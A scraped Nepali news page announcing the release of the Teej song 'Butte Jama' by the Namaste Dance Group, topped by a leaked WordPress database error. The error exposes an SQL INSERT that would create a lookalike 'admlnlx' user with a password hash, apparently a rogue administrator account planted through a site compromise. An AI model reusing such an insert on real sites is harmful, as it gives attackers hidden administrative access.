WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBXcRqXcL5CW6O91UJ649AuRfl0TiT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:37:04', '', 'admlnlx', 'admlnlx')

नमस्ते डान्स ग्रुपको “बुट्टे जामा” सार्वजनीक (भिडियो सहित) – Gaule Khabar

नमस्ते डान्स ग्रुपको “बुट्टे जामा” सार्वजनीक (भिडियो सहित)

नमस्ते डान्स ग्रुपको “बुट्टे जामा” सार्वजनीक (भिडियो सहित)

गाउँले न्युज, १५ साउन, काठमाण्डौं । नमस्ते डान्स ग्रुपले बजारमा “बुट्टे जामा” बोलको तिज गित सार्वजनीक गरेको छ ।
देविप्रसाद खनालको शब्द, रिजन थापा मगरको संगित र संगित संयोजन कार्साङ लामाको रहेको “बुट्टे जामा” गीतमा मिना नेपाल र रिजन थापाको स्वर सुन्न सकिने छ ।
उक्त गितको भिडियोमा प्रकाश शर्मा, मिङ्मा शेर्पाको साथमा नमस्ते डान्स ग्रुपको कलाकारहरुकले फिचरिङ गरेका छन् । म्युजिक भिडियोमा निर्देशन तथा कोरीयोग्राफि केशब कोईराला र देवराज गुरुङको रहेको छ । भिडियो छाँयाङ्कन तथा सम्पादन गंगा राम राईको रहेको छ । गाउँले इन्टरटेनमेन्ट मिडिया ग्रुपको ब्यानरमा निर्मित भिडियो नमस्ते डान्स एकेडेमी एण्ड डान्स ग्रुपको युटुव च्यानलबाट सार्वजनिक गरिएको छ ।

भिडियो

https://www.youtube.com/watch?v=9NL-94QqiWk

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका